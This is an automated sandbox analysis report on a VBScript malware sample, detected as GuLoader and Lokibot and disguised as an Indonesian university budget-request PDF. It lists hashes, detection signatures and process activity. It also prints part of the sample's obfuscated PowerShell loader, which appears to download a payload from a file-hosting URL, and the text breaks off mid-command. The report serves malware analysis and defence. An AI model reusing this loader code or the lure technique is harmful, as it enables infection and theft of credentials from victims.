Edit tour
Windows
Analysis Report
PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs
Overview
General Information
Sample name: | PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbsrenamed because original name is a hash value |
Original sample name: | PERMINTAAN ANGGARAN (Universitas IPB) ID177888pdf.vbs |
Analysis ID: | 1523886 |
MD5: | cf3ce0d565b919fe45d02705736fe824 |
SHA1: | 0924076c6434b432b18fd0b298a2b5b14e38b754 |
SHA256: | 96c1a11d9036afc58f65d8533f2c37b7fc64048e21bc60f28f0bb9311902e80f |
Infos: | |
Detection
GuLoader, Lokibot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7352 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\PERMI NTAAN ANGG ARAN (Univ ersitas IP B) ID17788 8#U00b7pdf .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7408 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Bjrgnin g Indicere de afskrkk elsesvaabn enes Halvf abrikatas Myosuture Skilteskri ft Pensils #>;$Ammon iacs='Befr agters';<# Avilion ke ndall kick ing #>;$At testerende =$host.Pri vateData;I f ($Attest erende) {$ Jernbaneli nier++;}fu nction Pre eliminator ($Amagerhy lde){$Druk kenbolten= $Chaussure +$Amagerhy lde.Length -$Jernbane linier;for ( $Getling =5;$Getlin g -lt $Dru kkenbolten ;$Getling+ =6){$Nordf ljs180+=$A magerhylde [$Getling] ;}$Nordflj s180;}func tion Glede rens($Flor aer207){ & ($Efter tragtelser s) ($Flora er207);}$S pisefrikva rteret=Pre eliminator 'GelatMPh otooSdsupz ss ori O b elQu etlRe nataamphi/ Tilh5Ve a n.Not r0Ud son Ind c( AfgasWSani tiLabi nHa rpudptomao Betraw Pl nsA.cum Ve dblNN,nmeT stfo so.s i1 a ne0Op ium.Jetti0 foraa;,nma n b,lthWMo dtai K otn ern6Ratba 4Tynds;Kol dk Supe xl egac6Cellm 4 Triu;Rol ni VinderM lescvMods, :per c1Par ti2 Pre 1e t al.Savne 0Edgew)Bel ly TrickGS .cceeHelti c AfgrkOle ogoVentr/B lods2 .isq 0S,uth1Fro ko0S nsi0k onde1Selek 0Batus1Udk ry DetonFH spiiVilla rGenn eBlu bbfCiffeoS alatxLabba /Midte1 Ve r,2 V rg1 Over.Kem i 0 oni ';$M elton=Pree liminator ' HandUUni veSAfs nEU nexprFrema - Blk AJac kfgBr gaed ekanN Ufly tAdnex ';$ Tessituras 160=Preeli minator 'F risthKvi d tB dbatLow ,ip.recasL ejei:E ter /Amati/S.m lidPret rS peediHandl vSyzyge Pa ti.Ove sg Ri.goDemis oPelvigUnc lelTwatceU nsu .Exo,e cUnco oFis kemMi mo/M ongcusja,k cAgrar? De .meMrkatx .ackp Fant ohkkerrCon vetOblig=N ulpudSstte oJordewEna arnReceplS kinnoGla s a OpsadK m mu&Cir uiS v dsdMerin =Drift1Non deQSlutmt Tyk OKonse kIdesvBGyn o JPagodW andgLStikp LintenxNon de3.erveD LiniwClonk BWall.CDiv isg Au,oRG l tsLSpina 8NonciQSy ecZzairiaT axam0Bonnn hKendeYSyn enUPa il0M ackiwSyndr tSundaSUds krj Gnis7S yvaa ';$Re skaleringe n=Preelimi nator 'S,r ig>Yu ca ' ;$Eftertra gtelsers=P reeliminat or 'Beavei EforeeAtta cX,ekto '; $Amazonern es='Chromo phoric';$C ogida='\Re ebok.Dia'; Glederens (Preelimin ator 'Lazu r$SvmmegPr oatlK ledo CatalbReal iaBulbolDa ks:Cam oV RecreOver vrListedVa skoe Di in Wa,ersThor phUdv siMa ttesSenegt S amnoMave frIndfriKo rnfs prudk Raile Reo xsVerds=Po lem$Fusene dimminHal, fv Intr:Bj .rgaPseudp H micpBekr adMajesaS efftOrakla ortr+blin $ReawoC B linoBudmag Destii Cou ndMemoraEl ekt ');Gle derens (Pr eeliminato r 'Jingl$M ayb gGaden lStikkoMus t b KnapaC ourtlPligt :CroaptAn ihrHeroleP aradbHy er a K ncnHet e eJanifn Lsni=Sente $ ConsT My steoutbls Sikks Pseu iPatentSta iuAlb.tr, utokaPacho sLevef1 M, mo6Fer d0 Chem.Unshi sSta dp.bs eslStockiS courtBr sk ( Hete$som eoRtoot.et ros s Anal klokalaKre atl .epteU nfurrBardu